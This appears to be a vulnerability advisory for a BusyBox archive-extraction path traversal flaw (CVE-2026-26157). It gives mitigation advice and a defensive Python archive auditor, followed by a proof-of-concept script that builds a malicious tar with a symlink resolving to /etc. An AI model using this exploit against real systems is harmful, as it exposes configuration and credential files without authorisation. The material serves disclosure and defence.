Overview
The BusyBox 1.37.0 vulnerability, identified as CVE-2026-26157, is a critical path traversal flaw that impacts systems utilizing this widely adopted software suite. BusyBox, often referred to as the “Swiss Army Knife” of embedded Linux, combines various Unix utilities into a single executable, making it a popular choice for resource-constrained environments. This vulnerability allows an attacker to manipulate file paths, potentially leading to unauthorized access to sensitive files on the system.
Technical Details
This vulnerability arises from improper validation of user-supplied input in file path handling routines within BusyBox. Specifically, an attacker can exploit this flaw by crafting a malicious request that includes directory traversal sequences (e.g., ../) to navigate the filesystem hierarchy. When the vulnerable BusyBox instance processes such input, it may inadvertently grant access to files outside its intended directory scope.
For example, an attacker could execute a command that retrieves sensitive configuration files or user data, such as /etc/passwd, thereby compromising the integrity and confidentiality of the system. This vulnerability is particularly severe in scenarios where BusyBox is used in web applications or network services, as it can lead to the exposure of critical information without authentication.
Impact
The potential consequences of exploiting CVE-2026-26157 are significant. An attacker could gain unauthorized access to sensitive files, leading to data breaches, system compromise, or further exploitation of the underlying infrastructure. In environments such as IoT devices, where BusyBox is commonly deployed, this could result in widespread vulnerabilities across multiple devices, affecting both consumer and enterprise systems.
Mitigation
To protect against CVE-2026-26157, security professionals should immediately update to the latest version of BusyBox, where the vulnerability has been addressed. Regular patch management is crucial in maintaining the security posture of any system. Additionally, implementing input validation and sanitization measures can help mitigate the risk of path traversal attacks.
Furthermore, employing security mechanisms such as file access controls, intrusion detection systems, and network segmentation can enhance overall security. Conducting regular security audits and penetration testing will also help identify and remediate potential vulnerabilities before they can be exploited by malicious actors.
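One practical form of the input validation recommended above is to inspect an archive before any extractor touches it. The following Python is an added example written for this advisory; it is not BusyBox code and not the PoC author's script. It models only the `strstr(cp, "/../")` pattern that the PoC docstring quotes from `strip_unsafe_prefix()` (the real function has more logic, which is not reproduced here), shows why a trailing `/..` slips past that pattern, and contrasts it with a component-wise check that resolves each symlink target relative to the directory the link will be created in. The sample archive is constructed in memory; the `build_sample_archive`, `symlink_escapes`, `member_escapes` and `audit_archive` names are this example's own.

```python
import io
import posixpath
import tarfile

# Added example (not BusyBox code and not the PoC author's): the flawed
# pattern check as the advisory quotes it, a component-wise replacement,
# and an audit that inspects an archive before anything is extracted.


def flawed_prefix_check(target: str) -> bool:
    """Mirror of the quoted strstr(cp, "/../") test (assumption: the real
    strip_unsafe_prefix() has more logic; only this pattern is modelled).
    Returns True when the 4-character pattern is present, i.e. when this
    sanitizer would act at all. A trailing "/.." never matches."""
    return "/../" in target


def symlink_escapes(member_name: str, linkname: str) -> bool:
    """Hardened check: resolve the link target relative to the directory the
    symlink will be created in and report whether it leaves the extraction
    root. Absolute targets and any net '..' component are rejected, so a
    trailing '/..' is caught as well as an embedded '/../'."""
    if linkname.startswith("/"):
        return True
    base = posixpath.dirname(member_name)
    resolved = posixpath.normpath(posixpath.join(base, linkname))
    return resolved == ".." or resolved.startswith("../")


def member_escapes(member_name: str) -> bool:
    """Same rule applied to the member path itself (classic ../ traversal)."""
    if member_name.startswith("/"):
        return True
    resolved = posixpath.normpath(member_name)
    return resolved == ".." or resolved.startswith("../")


def audit_archive(data: bytes) -> list:
    """Return (name, linkname) pairs for every member that would escape the
    extraction directory, either by its own path or through a symlink target.
    Run this on untrusted archives before handing them to any extractor."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r") as tar:
        for m in tar.getmembers():
            if member_escapes(m.name):
                findings.append((m.name, m.linkname))
            elif m.issym() and symlink_escapes(m.name, m.linkname):
                findings.append((m.name, m.linkname))
    return findings


def build_sample_archive() -> bytes:
    """Constructed in-memory archive: one benign relative symlink, the
    trailing-'..' symlink target from the advisory, and a plain '../' target."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        entries = [
            ("docs/link_to_readme", "../README"),  # resolves to README, inside root
            ("sensitive_data", "/etc/pam.d/.."),   # absolute, trailing '..'
            ("up", "../../outside"),               # ordinary traversal
        ]
        for name, linkname in entries:
            info = tarfile.TarInfo(name)
            info.type = tarfile.SYMTYPE
            info.linkname = linkname
            tar.addfile(info)
    return buf.getvalue()


if __name__ == "__main__":
    for name, linkname in audit_archive(build_sample_archive()):
        print(f"unsafe symlink: {name} -> {linkname}")
    print("flawed pattern check fires on '/etc/pam.d/..':",
          flawed_prefix_check("/etc/pam.d/.."))
```

The design point is that a substring search over the raw target string is the wrong abstraction: the check has to operate on path components after normalisation, and it has to account for where the link itself lives, since `../README` is harmless from `docs/` but escapes from the root. The audit deliberately reports the member path and the target together so that a reviewer can see which rule fired.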
Proof of Concept (PoC)
# Exploit Title: BusyBox 1.37.0 - Path Traversal
# Google Dork: N/A
# Date: 2026-02-11
# Exploit Author: Calil Khalil
# Vendor Homepage: https://busybox.net
# Software Link: https://busybox.net/downloads/
# Version: BusyBox 1.36.1, 1.37.0
# Tested on: Ubuntu 22.04 LTS, Alpine Linux 3.19
# CVE: CVE-2026-26157
"""
BusyBox Path Traversal Vulnerability (CVE-2026-26157)

Description:
BusyBox archive extraction utilities fail to properly sanitize symlink targets
containing trailing ".." components. The strip_unsafe_prefix() function in
archival/libarchive/unsafe_prefix.c uses strstr(cp, "/../") which only matches
the 4-character pattern and misses 3-character trailing "/.." sequences.
This allows an attacker to craft malicious archives with symlinks pointing to
arbitrary filesystem locations, enabling information disclosure through symlink
traversal.

Affected Components:
- tar (primary vector)
- unzip
- rpm
- ar

Impact:
- CVSS Score: 7.8 (HIGH)
- Arbitrary file read via symlink traversal
- Information disclosure
- Credential theft

Root Cause:
archival/libarchive/unsafe_prefix.c:23
The pattern matching in strip_unsafe_prefix() fails on trailing ".." paths:
    cp2 = strstr(cp, "/../");  // Only matches "/../", misses "/pam.d/.."
    if (!cp2) break;

Attack Scenario:
1. Attacker creates TAR archive with symlink: sensitive_data -> /etc/pam.d/..
2. Victim extracts archive using BusyBox tar
3. Symlink created without sanitization
4. Symlink resolves to /etc directory
5. Application reading 'sensitive_data' exposes /etc contents

References:
- https://github.com/calilkhalil/research
- Red Hat CNA Case: INC3907198
"""
import sys
import tarfile


def create_exploit():
    """
    Creates a malicious TAR file exploiting CVE-2026-26157.
    The archive contains a symlink with an unsanitized target that
    resolves outside the extraction directory.
    """
    exploit_file = 'CVE-2026-26157_exploit.tar'
    try:
        with tarfile.open(exploit_file, 'w') as tar:
            # Create symlink with trailing ".." in target path
            # This bypasses strip_unsafe_prefix() pattern matching
            info = tarfile.TarInfo('sensitive_data')
            info.type = tarfile.SYMTYPE
            info.linkname = '/etc/pam.d/..'  # Resolves to /etc
            tar.addfile(info)
        print(f"[+] Exploit created: {exploit_file}")
        print("\n[*] Exploitation steps:")
        print("    1. mkdir test_extraction && cd test_extraction")
        print(f"    2. busybox tar xf ../{exploit_file}")
        print("    3. readlink -f sensitive_data")
        print("       Expected output: /etc")
        print("    4. ls sensitive_data/")
        print("       Result: Lists /etc directory contents")
        print("\n[!] Impact: Arbitrary directory read via symlink traversal")
        print("[!] CVSS: 7.8 HIGH (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)")
        return exploit_file
    except Exception as e:
        print(f"[-] Error creating exploit: {e}")
        sys.exit(1)


def show_technical_details():
    """Display technical analysis of the vulnerability"""
    print("\n" + "=" * 70)
    print("TECHNICAL ANALYSIS - CVE-2026-26157")
    print("=" * 70)
    print("\nVulnerable Function:")
    print("  archival/libarchive/unsafe_prefix.c:strip_unsafe_prefix()")
    print("\nVulnerable Code Pattern:")
    print('  cp2 = strstr(cp, "/../");  // Only matches 4-char sequence')
    print("  if (!cp2) break;")
    print("\nBypass Technique:")
    print("  Path: /etc/pam.d/..")
    print('  Pattern check: strstr("/etc/pam.d/..", "/../") -> NULL')
    print("  Result: Sanitization bypassed, symlink created with original target")
    print("\nExploitation Flow:")
    print("  1. Archive contains: symlink 'sensitive_data' -> '/etc/pam.d/..'")
    print("  2. get_header_tar() extracts symlink metadata")
    print("  3. Symlink target NOT sanitized (bypass detected)")
    print("  4. data_extract_all() creates symlink with '/etc/pam.d/..'")
    print("  5. Target resolves: /etc/pam.d/.. -> /etc")
    print("  6. Reading 'sensitive_data' = reading /etc")
    print("=" * 70 + "\n")


if __name__ == "__main__":
    print("=" * 70)
    print("BusyBox Path Traversal Exploit - CVE-2026-26157")
    print("Author: Calil Khalil")
    print("=" * 70)

    # Display technical analysis
    show_technical_details()

    # Create exploit
    exploit_file = create_exploit()

    print("\n[*] Mitigation:")
    print("  - Update BusyBox to patched version")
    print("  - Patch applies strip_unsafe_prefix() to symlink targets")
    print("  - Do not extract untrusted archives with elevated privileges")
    print("\n[*] For educational and authorized testing purposes only")